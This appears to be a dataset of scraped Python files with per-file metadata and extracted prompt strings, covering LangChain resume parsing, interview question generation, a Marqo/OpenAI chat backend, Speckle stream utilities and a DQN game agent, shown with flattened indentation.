# Works with ChatGPT-3.5, Takes the Reader Resume Text File and return a JSON with Summary of Resume in it.
llm = ChatOpenAI(
model_name="gpt-3.5-turbo",
temperature=0,
max_tokens=1900,
frequency_penalty=0,
presence_penalty=0,
top_p=1.0,
)
schema = Object(
id="interviewer",
description=(
"interviewer is examining resume text and should produce set of attributes which represents that person by his resume"
),
attributes=[
Text(
id="summary_or_objective",
description="A brief overview of the candidate's professional background, skills, and career goals",
examples=[],
many=True,
),
Text(
id="work_experience",
description="Details of previous employment positions, including job titles, company names, employment dates, and a description of responsibilities and achievements for each role ",
examples=[],
many=True,
),
Text(
id="education",
description="Information about the candidate's educational qualifications, including degrees, certificates, and the names of institutions attended",
examples=[],
many=True,
),
Text(
id="skills",
description="A section highlighting the candidate's relevant skills, such as technical skills, languages spoken, software proficiency, or specific tools used",
examples=[],
many=True,
),
Text(
id="achievements_or_awards",
description="Any notable achievements, awards, or recognition received by the candidate during their education or career.",
examples=[],
many=True,
),
Text(
id="certifications_or_licenses",
description="Information about any professional certifications or licenses held by the candidate that are relevant to the desired position",
examples=[],
many=True,
),
Text(
id="projects",
description="Details of significant projects the candidate has worked on, including a brief description, their role, and any notable outcomes",
examples=[],
many=True,
),
Text(
id="publications_or_presentations",
description=" If applicable, a list of publications or presentations the candidate has authored or delivered, including the titles, dates, and locations",
examples=[],
many=True,
),
],
many=True,
)
# chain = LLMChain(llm=llm1, prompt=PROMPT)
chain = create_extraction_chain(llm, schema, encoder_or_encoder_class='json')
return chain.predict_and_parse(text=text)['data']
| [] |
2024-01-10 | VVKMulukutla/JustASimpleInterviewGradingSystem | follow_up_question_gen~FollowUpQuesGen.py | from langchain.prompts.prompt import PromptTemplate
from langchain.chains import LLMChain
from langchain.llms import OpenAI
def question_generation(question, ans, context):
# Define the prompt template for generating follow-up questions
PROMPT_TEMPLATE = """Answer the following question:
{question}
Here is the user given answer:
{answer}
Based on the following context:
{context}
-
what are the top 3 follow-up questions to ask with the intent to validate the genuinity of the answer and to gather more insights about the candidate in relation to the context?
"""
# Create a PromptTemplate object with the input variables and template
PROMPT = PromptTemplate(input_variables=["question", "answer", "context"], template=PROMPT_TEMPLATE)
# Create an OpenAI language model (LLM) instance
llm = OpenAI(model_name="text-davinci-003",
temperature=0.7,
max_tokens=100,
top_p=1.0,
frequency_penalty=0.0,
presence_penalty=0.0)
# Create an LLMChain instance with the LLM and prompt template
chain = LLMChain(llm=llm, prompt=PROMPT)
# Apply the chain
chain.apply
# Predict and parse the follow-up questions using the chain
q = chain.predict_and_parse(question=question, answer=ans, context=context)
# Return the generated follow-up questions
return q
| [
"question",
"Answer the following question:\n {question}\n Here is the user given answer:\n {answer}\n Based on the following context:\n {context}\n -\n what are the top 3 follow-up questions to ask with the intent to validate the genuinity of the answer and to gather more insights about the candidate in relation to the context?\n ",
"context",
"answer"
] |
2024-01-10 | OwenPendrighElliott/MarqoKnowledgeManagement | backend~ai_chat.py | import openai
from data_models import HumanMessage, AIMessage, SystemMessage
import json
from utils import remove_responses
from knowledge_store import MarqoKnowledgeStore
from typing import List, Dict, Generator
from dotenv import load_dotenv
load_dotenv()
FUNCTIONS = [
{
"name": "search_marqo",
"description": "This is a search engine, use it when the user instructs you to search in any way. Also use it for organisational knowledge or personal information.",
"parameters": {
"type": "object",
"properties": {
"query": {
"type": "string",
"description": "A natural language search query",
},
},
"required": ["query"],
},
},
]
def search_marqo(query: str, mks: MarqoKnowledgeStore, limit: int) -> str:
try:
results = mks.query_for_content(query, limit=limit if limit is not None else 4)
return json.dumps(results)
except Exception as e:
return {"marqo_search_error": e}
def format_chat(conversation: List[str], user_input: str) -> List[Dict[str, str]]:
llm_conversation = [
SystemMessage(
content="All code should specify the language so that markdown can be rendered."
)
]
for i in range(len(conversation)):
if i % 2:
msg = AIMessage(content=remove_responses(conversation[i]))
else:
msg = HumanMessage(content=conversation[i])
llm_conversation.append(msg)
llm_conversation.append(HumanMessage(content=user_input))
open_ai_conversation = [vars(m) for m in llm_conversation]
return open_ai_conversation
def append_function_deltas(
function_call: Dict[str, str], delta_function_call: Dict[str, str]
) -> Dict[str, str]:
function_call["arguments"] += delta_function_call["arguments"]
return function_call
def converse(
user_input: str, conversation: List[str], mks: MarqoKnowledgeStore, limit: int
) -> Generator:
conversation = format_chat(conversation, user_input)
stream1 = openai.ChatCompletion.create(
model="gpt-3.5-turbo-0613",
messages=conversation,
functions=FUNCTIONS,
function_call="auto",
stream=True,
)
function_call = None
for chunk in stream1:
token = chunk["choices"][0].get("delta", {}).get("content")
if token is not None:
yield token.encode("utf-8")
elif (
chunk["choices"][0]["delta"].get("function_call") and function_call is None
):
yield "```curl\nBackend Function Call\n".encode("utf-8")
func = chunk["choices"][0]["delta"]["function_call"]
yield f"Function: {func['name']}\n".encode("utf-8")
yield "Arguments:\n".encode("utf-8")
yield func["arguments"].encode("utf-8")
function_call = func
elif chunk["choices"][0]["delta"].get("function_call"):
func = chunk["choices"][0]["delta"]["function_call"]
yield func["arguments"].encode("utf-8")
function_call = append_function_deltas(function_call, func)
if function_call is not None:
yield "\n```\n".encode("utf-8")
stream1.close()
message = {
"role": "assistant",
"content": None,
"function_call": {
"name": function_call["name"],
"arguments": function_call["arguments"],
},
}
if message.get("function_call"):
function_name = message["function_call"]["name"]
arguments = json.loads(message["function_call"]["arguments"])
function_response = search_marqo(
query=arguments.get("query"), mks=mks, limit=limit
)
yield "\n```curl\nResponse:\n".encode("utf-8")
yield f"{json.dumps(function_response, indent=4)}\n```\n".encode("utf-8")
stream2 = openai.ChatCompletion.create(
model="gpt-3.5-turbo-0613",
messages=[
*conversation,
message,
{
"role": "function",
"name": function_name,
"content": function_response,
},
],
stream=True,
)
for chunk in stream2:
token = chunk["choices"][0].get("delta", {}).get("content")
if token is not None:
yield token.encode("utf-8")
stream2.close()
| [
"All code should specify the language so that markdown can be rendered.",
"None"
] |
2024-01-10 | SerjoschDuering/RECODE_speckle_utils | speckle_utils.py | #speckle utils
import json
import pandas as pd
import numpy as np
import specklepy
from specklepy.api.client import SpeckleClient
from specklepy.api.credentials import get_default_account, get_local_accounts
from specklepy.transports.server import ServerTransport
from specklepy.api import operations
from specklepy.objects.geometry import Polyline, Point, Mesh
from specklepy.api.wrapper import StreamWrapper
try:
import openai
except:
pass
import requests
from datetime import datetime
import copy
# HELP FUNCTION ===============================================================
def helper():
"""
Prints out the help message for this module.
"""
print("This module contains a set of utility functions for speckle streams.")
print("______________________________________________________________________")
print("It requires the specklepy package to be installed -> !pip install specklepy")
print("the following functions are available:")
print("getSpeckleStream(stream_id, branch_name, client)")
print("getSpeckleGlobals(stream_id, client)")
print("get_dataframe(objects_raw, return_original_df)")
print("updateStreamAnalysis(stream_id, new_data, branch_name, geometryGroupPath, match_by_id, openai_key, return_original)")
print("there are some more function available not documented fully yet, including updating a notion database")
print("______________________________________________________________________")
print("for detailed help call >>> help(speckle_utils.function_name) <<< ")
print("______________________________________________________________________")
print("standard usage:")
print("______________________________________________________________________")
print("retreiving data")
print("1. import speckle_utils & speckle related libaries from specklepy")
print("2. create a speckle client -> client = SpeckleClient(host='https://speckle.xyz/')" )
print(" client.authenticate_with_token(token='your_token_here')")
print("3. get a speckle stream -> stream = speckle_utils.getSpeckleStream(stream_id, branch_name, client)")
print("4. get the stream data -> data = stream['pth']['to']['data']")
print("5. transform data to dataframe -> df = speckle_utils.get_dataframe(data, return_original_df=False)")
print("______________________________________________________________________")
print("updating data")
print("1. call updateStreamAnalysis --> updateStreamAnalysis(new_data, stream_id, branch_name, geometryGroupPath, match_by_id, openai_key, return_original)")
#==============================================================================
def getSpeckleStream(stream_id,
branch_name,
client,
commit_id=""
):
"""
Retrieves data from a specific branch of a speckle stream.
Args:
stream_id (str): The ID of the speckle stream.
branch_name (str): The name of the branch within the speckle stream.
client (specklepy.api.client.Client, optional): A speckle client. Defaults to a global `client`.
commit_id (str): id of a commit, if nothing is specified, the latest commit will be fetched
Returns:
dict: The speckle stream data received from the specified branch.
This function retrieves the last commit from a specific branch of a speckle stream.
It uses the provided speckle client to get the branch and commit information, and then
retrieves the speckle stream data associated with the last commit.
It prints out the branch details and the creation dates of the last three commits for debugging purposes.
"""
print("updated A")
# set stream and branch
try:
branch = client.branch.get(stream_id, branch_name, 3)
print(branch)
except:
branch = client.branch.get(stream_id, branch_name, 1)
print(branch)
print("last three commits:")
[print(ite.createdAt) for ite in branch.commits.items]
if commit_id == "":
latest_commit = branch.commits.items[0]
choosen_commit_id = latest_commit.id
commit = client.commit.get(stream_id, choosen_commit_id)
print("latest commit ", branch.commits.items[0].createdAt, " was choosen")
elif type(commit_id) == type("s"): # string, commit uuid
choosen_commit_id = commit_id
commit = client.commit.get(stream_id, choosen_commit_id)
print("provided commit ", choosen_commit_id, " was choosen")
elif type(commit_id) == type(1): #int
latest_commit = branch.commits.items[commit_id]
choosen_commit_id = latest_commit.id
commit = client.commit.get(stream_id, choosen_commit_id)
print(commit)
print(commit.referencedObject)
# get transport
transport = ServerTransport(client=client, stream_id=stream_id)
#speckle stream
res = operations.receive(commit.referencedObject, transport)
return res
def getSpeckleGlobals(stream_id, client):
"""
Retrieves global analysis information from the "globals" branch of a speckle stream.
Args:
stream_id (str): The ID of the speckle stream.
client (specklepy.api.client.Client, optional): A speckle client. Defaults to a global `client`.
Returns:
analysisInfo (dict or None): The analysis information retrieved from globals. None if no globals found.
analysisGroups (list or None): The analysis groups retrieved from globals. None if no globals found.
This function attempts to retrieve and parse the analysis information from the "globals"
branch of the specified speckle stream. It accesses and parses the "analysisInfo" and "analysisGroups"
global attributes, extracts analysis names and UUIDs.
If no globals are found in the speckle stream, it returns None for both analysisInfo and analysisGroups.
"""
# get the latest commit
try:
# speckle stream globals
branchGlob = client.branch.get(stream_id, "globals")
latest_commit_Glob = branchGlob.commits.items[0]
transport = ServerTransport(client=client, stream_id=stream_id)
globs = operations.receive(latest_commit_Glob.referencedObject, transport)
# access and parse globals
#analysisInfo = json.loads(globs["analysisInfo"]["@{0;0;0;0}"][0].replace("'", '"'))
#analysisGroups = [json.loads(gr.replace("'", '"')) for gr in globs["analysisGroups"]["@{0}"]]
def get_error_context(e, context=100):
start = max(0, e.pos - context)
end = e.pos + context
error_line = e.doc[start:end]
pointer_line = ' ' * (e.pos - start - 1) + '^'
return error_line, pointer_line
try:
analysisInfo = json.loads(globs["analysisInfo"]["@{0;0;0;0}"][0].replace("'", '"').replace("None", "null"))
except json.JSONDecodeError as e:
print(f"Error decoding analysisInfo: {e}")
error_line, pointer_line = get_error_context(e)
print("Error position and surrounding text:")
print(error_line)
print(pointer_line)
analysisInfo = None
try:
analysisGroups = [json.loads(gr.replace("'", '"').replace("None", "null")) for gr in globs["analysisGroups"]["@{0}"]]
except json.JSONDecodeError as e:
print(f"Error decoding analysisGroups: {e}")
error_line, pointer_line = get_error_context(e)
print("Error position and surrounding text:")
print(error_line)
print(pointer_line)
analysisGroups = None
# extract analysis names
analysis_names = []
analysis_uuid = []
[(analysis_names.append(key.split("++")[0]),analysis_uuid.append(key.split("++")[1]) ) for key in analysisInfo.keys()]
# print extracted results
print("there are global dictionaries with additional information for each analysis")
print("<analysisGroups> -> ", [list(curgrp.keys()) for curgrp in analysisGroups])
print("<analysis_names> -> ", analysis_names)
print("<analysis_uuid> -> ", analysis_uuid)
except Exception as e: # catch exception as 'e'
analysisInfo = None
analysisGroups = None
print("No GlOBALS FOUND")
print(f"Error: {e}") # print error description
return analysisInfo, analysisGroups
#function to extract non geometry data from speckle
def get_dataframe(objects_raw, return_original_df=False):
"""
Creates a pandas DataFrame from a list of raw Speckle objects.
Args:
objects_raw (list): List of raw Speckle objects.
return_original_df (bool, optional): If True, the function also returns the original DataFrame before any conversion to numeric. Defaults to False.
Returns:
pd.DataFrame or tuple: If return_original_df is False, returns a DataFrame where all numeric columns have been converted to their respective types,
and non-numeric columns are left unchanged.
If return_original_df is True, returns a tuple where the first item is the converted DataFrame,
and the second item is the original DataFrame before conversion.
This function iterates over the raw Speckle objects, creating a dictionary for each object that excludes the '@Geometry' attribute.
These dictionaries are then used to create a pandas DataFrame.
The function attempts to convert each column to a numeric type if possible, and leaves it unchanged if not.
Non-convertible values in numeric columns are replaced with their original values.
"""
# dataFrame
df_data = []
# Iterate over speckle objects
for obj_raw in objects_raw:
obj = obj_raw.__dict__
df_obj = {k: v for k, v in obj.items() if k != '@Geometry'}
df_data.append(df_obj)
# Create DataFrame and GeoDataFrame
df = pd.DataFrame(df_data)
# Convert columns to float or int if possible, preserving non-convertible values <-
df_copy = df.copy()
for col in df.columns:
df[col] = pd.to_numeric(df[col], errors='coerce')
df[col].fillna(df_copy[col], inplace=True)
if return_original_df:
return df, df_copy
else:
return df
def updateStreamAnalysis(
client,
new_data,
stream_id,
branch_name,
geometryGroupPath=None,
match_by_id="",
openai_key ="",
return_original = False
):
"""
Updates Stream Analysis by modifying object attributes based on new data.
Args:
new_data (pandas.DataFrame): DataFrame containing new data.
stream_id (str): Stream ID.
branch_name (str): Branch name.
geometry_group_path (list, optional): Path to geometry group. Defaults to ["@Data", "@{0}"].
match_by_id (str, optional): key for column that should be used for matching. If empty, the index is used.
openai_key (str, optional): OpenAI key. If empty no AI commit message is generated Defaults to an empty string.
return_original (bool, optional): Determines whether to return original speckle stream objects. Defaults to False.
Returns:
list: original speckle stream objects as backup if return_original is set to True.
This function retrieves the latest commit from a specified branch, obtains the
necessary geometry objects, and matches new data with existing objects using
an ID mapper. The OpenAI GPT model is optionally used to create a commit summary
message. Changes are sent back to the server and a new commit is created, with
the original objects returned as a backup if return_original is set to True.
The script requires active server connection, necessary permissions, and relies
on Speckle and OpenAI's GPT model libraries.
"""
if geometryGroupPath == None:
geometryGroupPath = ["@Speckle", "Geometry"]
branch = client.branch.get(stream_id, branch_name, 2)
latest_commit = branch.commits.items[0]
commitID = latest_commit.id
commit = client.commit.get(stream_id, commitID)
# get objects
transport = ServerTransport(client=client, stream_id=stream_id)
#speckle stream
res = operations.receive(commit.referencedObject, transport)
# get geometry objects (they carry the attributes)
objects_raw = res[geometryGroupPath[0]][geometryGroupPath[1]]
res_new = copy.deepcopy(res)
# map ids
id_mapper = {}
if match_by_id != "":
for i, obj in enumerate(objects_raw):
id_mapper[obj[match_by_id]] = i
else:
for i, obj in enumerate(objects_raw):
id_mapper[str(i)] = i
# iterate through rows (objects)
for index, row in new_data.iterrows():
#determin target object
if match_by_id != "":
local_id = row[match_by_id]
else:
local_id = index
target_id = id_mapper[local_id]
#iterate through columns (attributes)
for col_name in new_data.columns:
res_new[geometryGroupPath[0]][geometryGroupPath[1]][target_id][col_name] = row[col_name]
# ======================== OPEN AI FUN ===========================
try:
answer_summary = gptCommitMessage(objects_raw, new_data,openai_key)
if answer_summary == None:
_, answer_summary = compareStats(get_dataframe(objects_raw),new_data)
except:
_, answer_summary = compareStats(get_dataframe(objects_raw),new_data)
# ================================================================
new_objects_raw_speckle_id = operations.send(base=res_new, transports=[transport])
# You can now create a commit on your stream with this object
commit_id = client.commit.create(
stream_id=stream_id,
branch_name=branch_name,
object_id=new_objects_raw_speckle_id,
message="Updated item in colab -" + answer_summary,
)
print("Commit created!")
if return_original:
return objects_raw #as back-up
def custom_describe(df):
# Convert columns to numeric if possible
df = df.apply(lambda x: pd.to_numeric(x, errors='ignore'))
# Initial describe with 'include = all'
desc = df.describe(include='all')
# Desired statistics
desired_stats = ['count', 'unique', 'mean', 'min', 'max']
# Filter for desired statistics
result = desc.loc[desired_stats, :].copy()
return result
def compareStats(df_before, df_after):
"""
Compares the descriptive statistics of two pandas DataFrames before and after some operations.
Args:
df_before (pd.DataFrame): DataFrame representing the state of data before operations.
df_after (pd.DataFrame): DataFrame representing the state of data after operations.
Returns:
The CSV string includes column name, intervention type, and before and after statistics for each column.
The summary string provides a count of updated and new columns.
This function compares the descriptive statistics of two DataFrames: 'df_before' and 'df_after'.
It checks the columns in both DataFrames and categorizes them as either 'updated' or 'new'.
The 'updated' columns exist in both DataFrames while the 'new' columns exist only in 'df_after'.
For 'updated' columns, it compares the statistics before and after and notes the differences.
For 'new' columns, it lists the 'after' statistics and marks the 'before' statistics as 'NA'.
The function provides a summary with the number of updated and new columns,
and a detailed account in CSV format of changes in column statistics.
"""
desc_before = custom_describe(df_before)
desc_after = custom_describe(df_after)
# Get union of all columns
all_columns = set(desc_before.columns).union(set(desc_after.columns))
# Track number of updated and new columns
updated_cols = 0
new_cols = 0
# Prepare DataFrame output
output_data = []
for column in all_columns:
row_data = {'column': column}
stat_diff = False # Track if there's a difference in stats for a column
# Check if column exists in both dataframes
if column in desc_before.columns and column in desc_after.columns:
updated_cols += 1
row_data['interventionType'] = 'updated'
for stat in desc_before.index:
before_val = round(desc_before.loc[stat, column], 1) if pd.api.types.is_number(desc_before.loc[stat, column]) else desc_before.loc[stat, column]
after_val = round(desc_after.loc[stat, column], 1) if pd.api.types.is_number(desc_after.loc[stat, column]) else desc_after.loc[stat, column]
if before_val != after_val:
stat_diff = True
row_data[stat+'_before'] = before_val
row_data[stat+'_after'] = after_val
elif column in desc_after.columns:
new_cols += 1
stat_diff = True
row_data['interventionType'] = 'new'
for stat in desc_after.index:
row_data[stat+'_before'] = 'NA'
after_val = round(desc_after.loc[stat, column], 1) if pd.api.types.is_number(desc_after.loc[stat, column]) else desc_after.loc[stat, column]
row_data[stat+'_after'] = after_val
# Only add to output_data if there's actually a difference in the descriptive stats between "before" and "after".
if stat_diff:
output_data.append(row_data)
output_df = pd.DataFrame(output_data)
csv_output = output_df.to_csv(index=False)
print (output_df)
# Add summary to beginning of output
summary = f"Summary:\n Number of updated columns: {updated_cols}\n Number of new columns: {new_cols}\n\n"
csv_output = summary + csv_output
return csv_output, summary
# Function to call ChatGPT API
def ask_chatgpt(prompt, model="gpt-3.5-turbo", max_tokens=300, n=1, stop=None, temperature=0.3):
import openai
response = openai.ChatCompletion.create(
model=model,
messages=[
{"role": "system", "content": "You are a helpfull assistant,."},
{"role": "user", "content": prompt}
],
max_tokens=max_tokens,
n=n,
stop=stop,
temperature=temperature,
)
return response.choices[0].message['content']
def gptCommitMessage(objects_raw, new_data,openai_key):
# the idea is to automatically create commit messages. Commits coming through this channel are all
# about updating or adding a dataTable. So we can compare the descriptive stats of a before and after
# data frame
#try:
try:
import openai
openai.api_key = openai_key
except NameError as ne:
if str(ne) == "name 'openai' is not defined":
print("No auto commit message: openai module not imported. Please import the module before setting the API key.")
elif str(ne) == "name 'openai_key' is not defined":
print("No auto commit message: openai_key is not defined. Please define the variable before setting the API key.")
else:
raise ne
report, summary = compareStats(get_dataframe(objects_raw),new_data)
# prompt
prompt = f"""Given the following changes in my tabular data structure, generate a
precise and informative commit message. The changes involve updating or adding
attribute keys and values. The provided summary statistics detail the changes in
the data from 'before' to 'after'.
The CSV format below demonstrates the structure of the summary:
Summary:
Number of updated columns: 2
Number of new columns: 1
column,interventionType,count_before,count_after,unique_before,unique_after,mean_before,mean_after,min_before,min_after,max_before,max_after
A,updated,800,800,2,3,,nan,nan,nan,nan,nan
B,updated,800,800,3,3,,nan,nan,nan,nan,nan
C,new,NA,800,NA,4,NA,nan,NA,nan,NA,nan
For the commit message, your focus should be on changes in the data structure, not the interpretation of the content. Be precise, state the facts, and highlight significant differences or trends in the statistics, such as shifts in mean values or an increase in unique entries.
Based on the above guidance, draft a commit message using the following actual summary statistics:
{report}
Your commit message should follow this structure:
1. Brief description of the overall changes.
2. Significant changes in summary statistics (count, unique, mean, min, max).
3. Conclusion, summarizing the most important findings with the strucutre:
# changed columns: , comment: ,
# added Columns: , comment: ,
# Chaged statistic: , coment: ,
Mark the beginning of the conclusion with ">>>" and ensure to emphasize hard facts and significant findings.
"""
try:
answer = ask_chatgpt(prompt)
answer_summery = answer.split(">>>")[1]
if answer == None:
answer_summery = summary
except:
answer_summery = summary
return answer_summery
def specklePolyline_to_BokehPatches(speckle_objs, pth_to_geo="curves", id_key="ids"):
"""
Takes a list of speckle objects, extracts the polyline geometry at the specified path, and returns a dataframe of x and y coordinates for each polyline.
This format is compatible with the Bokeh Patches object for plotting.
Args:
speckle_objs (list): A list of Speckle Objects
pth_to_geo (str): Path to the geometry in the Speckle Object
id_key (str): The key to use for the uuid in the dataframe. Defaults to "uuid"
Returns:
pd.DataFrame: A Pandas DataFrame with columns "uuid", "patches_x" and "patches_y"
"""
patchesDict = {"uuid":[], "patches_x":[], "patches_y":[]}
for obj in speckle_objs:
obj_geo = obj[pth_to_geo]
obj_pts = Polyline.as_points(obj_geo)
coorX = []
coorY = []
for pt in obj_pts:
coorX.append(pt.x)
coorY.append(pt.y)
patchesDict["patches_x"].append(coorX)
patchesDict["patches_y"].append(coorY)
patchesDict["uuid"].append(obj[id_key])
return pd.DataFrame(patchesDict)
def rebuildAnalysisInfoDict(analysisInfo):
"""rebuild the analysisInfo dictionary to remove the ++ from the keys
Args:
analysisInfo (list): a list containing the analysisInfo dictionary
Returns:
dict: a dictionary containing the analysisInfo dictionary with keys without the ++
"""
analysisInfoDict = {}
for curKey in analysisInfo[0]:
newkey = curKey.split("++")[0]
analysisInfoDict[newkey] = analysisInfo[0][curKey]
return analysisInfoDict
def specklePolyline2Patches(speckle_objs, pth_to_geo="curves", id_key=None):
"""
Converts Speckle objects' polyline information into a format suitable for Bokeh patches.
Args:
speckle_objs (list): A list of Speckle objects.
pth_to_geo (str, optional): The path to the polyline geometric information in the Speckle objects. Defaults to "curves".
id_key (str, optional): The key for object identification. Defaults to "uuid".
Returns:
DataFrame: A pandas DataFrame with three columns - "uuid", "patches_x", and "patches_y". Each row corresponds to a Speckle object.
"uuid" column contains the object's identifier.
"patches_x" and "patches_y" columns contain lists of x and y coordinates of the polyline points respectively.
This function iterates over the given Speckle objects, retrieves the polyline geometric information and the object's id from each Speckle object,
and formats this information into a format suitable for Bokeh or matplotlib patches. The formatted information is stored in a dictionary with three lists
corresponding to the "uuid", "patches_x", and "patches_y", and this dictionary is then converted into a pandas DataFrame.
"""
patchesDict = {"patches_x":[], "patches_y":[]}
if id_key != None:
patchesDict[id_key] = []
for obj in speckle_objs:
obj_geo = obj[pth_to_geo]
coorX = []
coorY = []
if isinstance(obj_geo, Mesh):
# For meshes, we'll just use the vertices for now
for pt in obj_geo.vertices:
coorX.append(pt.x)
coorY.append(pt.y)
else:
# For polylines, we'll use the existing logic
obj_pts = Polyline.as_points(obj_geo)
for pt in obj_pts:
coorX.append(pt.x)
coorY.append(pt.y)
patchesDict["patches_x"].append(coorX)
patchesDict["patches_y"].append(coorY)
if id_key != None:
patchesDict[id_key].append(obj[id_key])
return pd.DataFrame(patchesDict)
#================= NOTION INTEGRATION ============================
headers = {
"Notion-Version": "2022-06-28",
"Content-Type": "application/json"
}
def get_page_id(token, database_id, name):
headers['Authorization'] = "Bearer " + token
# Send a POST request to the Notion API
response = requests.post(f"https://api.notion.com/v1/databases/{database_id}/query", headers=headers)
# Load the response data
data = json.loads(response.text)
# Check each page in the results
for page in data['results']:
# If the name matches, return the ID
if page['properties']['name']['title'][0]['text']['content'] == name:
return page['id']
# If no match was found, return None
return None
def add_or_update_page(token, database_id, name, type, time_updated, comment, speckle_link):
# Format time_updated as a string 'YYYY-MM-DD'
date_string = time_updated.strftime('%Y-%m-%d')
# Construct the data payload
data = {
'parent': {'database_id': database_id},
'properties': {
'name': {'title': [{'text': {'content': name}}]},
'type': {'rich_text': [{'text': {'content': type}}]},
'time_updated': {'date': {'start': date_string}},
'comment': {'rich_text': [{'text': {'content': comment}}]},
'speckle_link': {'rich_text': [{'text': {'content': speckle_link}}]}
}
}
# Check if a page with this name already exists
page_id = get_page_id(token, database_id, name)
headers['Authorization'] = "Bearer " + token
if page_id:
# If the page exists, send a PATCH request to update it
response = requests.patch(f"https://api.notion.com/v1/pages/{page_id}", headers=headers, data=json.dumps(data))
else:
# If the page doesn't exist, send a POST request to create it
response = requests.post("https://api.notion.com/v1/pages", headers=headers, data=json.dumps(data))
print(response.text)
# Use the function
#add_or_update_page('your_token', 'your_database_id', 'New Title', 'New Type', datetime.now(), 'This is a comment', 'https://your-link.com')
| [
"<class 'type'>",
"Given the following changes in my tabular data structure, generate a \n precise and informative commit message. The changes involve updating or adding \n attribute keys and values. The provided summary statistics detail the changes in \n the data from 'before' to 'after'. \n The CSV format below demonstrates the structure of the summary:\n\n Summary:\n Number of updated columns: 2\n Number of new columns: 1\n column,interventionType,count_before,count_after,unique_before,unique_after,mean_before,mean_after,min_before,min_after,max_before,max_after\n A,updated,800,800,2,3,,nan,nan,nan,nan,nan\n B,updated,800,800,3,3,,nan,nan,nan,nan,nan\n C,new,NA,800,NA,4,NA,nan,NA,nan,NA,nan\n\n For the commit message, your focus should be on changes in the data structure, not the interpretation of the content. Be precise, state the facts, and highlight significant differences or trends in the statistics, such as shifts in mean values or an increase in unique entries.\n\n Based on the above guidance, draft a commit message using the following actual summary statistics:\n\n PLACEHOLDER\n\n Your commit message should follow this structure:\n\n 1. Brief description of the overall changes.\n 2. Significant changes in summary statistics (count, unique, mean, min, max).\n 3. Conclusion, summarizing the most important findings with the strucutre:\n # changed columns: , comment: ,\n # added Columns: , comment: ,\n # Chaged statistic: , coment: ,\n\n Mark the beginning of the conclusion with \">>>\" and ensure to emphasize hard facts and significant findings. \n ",
"You are a helpfull assistant,."
] |
2024-01-10 | tzutengweng33176/ADL_2019 | A3~agent_dir~agent_ddqn.py | import random
import math
import numpy as np
import torch
import torch.nn.functional as F
import torch.optim as optim
import torch.nn as nn
from collections import namedtuple
import matplotlib.pyplot as plt
from agent_dir.agent import Agent
from environment import Environment
import pickle
use_cuda = torch.cuda.is_available()
Transition = namedtuple('Transition', ('state', 'action', 'next_state', 'reward'))
#experience replay
#break correlations in data, bring us back to iid setting
#Learn from all past policies
class ReplayMemory(object):
def __init__(self, capacity):
self.capacity = capacity
self.memory=[]
self.position= 0
def push(self, *args):
'''
Save a transition
'''
if len(self.memory) < self.capacity:
self.memory.append(None) #append a None or index will go out of range
#print(*args)
#https://www.saltycrane.com/blog/2008/01/how-to-use-args-and-kwargs-in-python/
#input()
self.memory[self.position]= Transition(*args)
self.position= (self.position+1)% self.capacity
def sample(self, batch_size):
return random.sample(self.memory, batch_size)
def __len__(self): #https://blog.csdn.net/u013061183/article/details/74773196
return len(self.memory)
class DQN(nn.Module): #this is the critic, the value function; Q-networks represent value functions with weights w
'''
This architecture is the one from OpenAI Baseline, with small modification.
'''
def __init__(self, channels, num_actions):
super(DQN, self).__init__()
self.conv1 = nn.Conv2d(channels, 32, kernel_size=8, stride=4)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
self.fc = nn.Linear(3136, 512)
self.head = nn.Linear(512, num_actions)
self.relu = nn.ReLU()
self.lrelu = nn.LeakyReLU(0.01)
#DQN will compute the expected return of taking each action(total 7 actions) given the current state
def forward(self, x):
x = self.relu(self.conv1(x))
x = self.relu(self.conv2(x))
x = self.relu(self.conv3(x))
x = self.lrelu(self.fc(x.view(x.size(0), -1)))
q = self.head(x)
return q
class AgentDQN(Agent):
def __init__(self, env, args):
self.env = env
self.input_channels = 4 #what is input channels ??? -->take the last 4 frames
self.num_actions = self.env.action_space.n # 7 actions
# TODO:
# Initialize your replay buffer
self.memory = ReplayMemory(10000)
# build target, online network
self.target_net = DQN(self.input_channels, self.num_actions)
self.target_net = self.target_net.cuda() if use_cuda else self.target_net
self.online_net = DQN(self.input_channels, self.num_actions)
self.online_net = self.online_net.cuda() if use_cuda else self.online_net
if args.test_dqn:
self.load('dqn')
# discounted reward
self.GAMMA = 0.99
# training hyperparameters
self.train_freq = 4 # frequency to train the online network
self.learning_start = 10000 # before we start to update our network, we wait a few steps first to fill the replay.
self.batch_size = 32
self.num_timesteps = 300000 # total training steps -->you can change it to 1000000 in report Q2
self.display_freq = 10 # frequency to display training progress
self.save_freq = 200000 # frequency to save the model
self.target_update_freq = 1000 # frequency to update target network
#epsilon greedy policy hyperparameters
self.eps_start = 0.9
self.eps_end = 0.05
self.eps_decay= 200
# optimizer
self.optimizer = optim.RMSprop(self.online_net.parameters(), lr=1e-4)
#fix the target net, update the parameters in the online_net
#freeze target Q network to avoid oscillation
self.steps = 0 # num. of passed steps. this may be useful in controlling exploration
self.device= torch.device("cuda" if use_cuda else "cpu")
def save(self, save_path):
print('save model to', save_path)
torch.save(self.online_net.state_dict(), save_path + '_online.cpt')
torch.save(self.target_net.state_dict(), save_path + '_target.cpt')
def load(self, load_path):
print('load model from', load_path)
if use_cuda:
self.online_net.load_state_dict(torch.load(load_path + '_online.cpt'))
self.target_net.load_state_dict(torch.load(load_path + '_target.cpt'))
else:
self.online_net.load_state_dict(torch.load(load_path + '_online.cpt', map_location=lambda storage, loc: storage))
self.target_net.load_state_dict(torch.load(load_path + '_target.cpt', map_location=lambda storage, loc: storage))
def init_game_setting(self):
# we don't need init_game_setting in DQN
pass
def make_action(self, state, test=False):
# TODO:
if not test:
# At first, you decide whether you want to explore the environemnt
sample= random.random()
#implementation of epsilon greedy exploration algorithms
eps_threshold = self.eps_end +(self.eps_start-self.eps_end)*math.exp(-1*self.steps/self.eps_decay)
#self.steps +=1 #see def train(), already in there
# TODO:
# if explore, you randomly samples one action
# else, use your model to predict action
if sample > eps_threshold: #no explore
with torch.no_grad():
#print(self.online_net(state))
#print(self.online_net(state).shape) #torch.Size([1, 7])
#print(self.online_net(state).max(1)) #(tensor([0.0511], device='cuda:0'), tensor([6], device='cuda:0'))
#print(self.online_net(state).max(1)[1].view(1, 1)) #tensor([[4]], device='cuda:0')
action= self.online_net(state).max(1)[1].view(1, 1) #policy function is right here
#pi'(s) = argmax(a) Q(s, a)
#the policy function does not have extra parameters, it depends on the value function
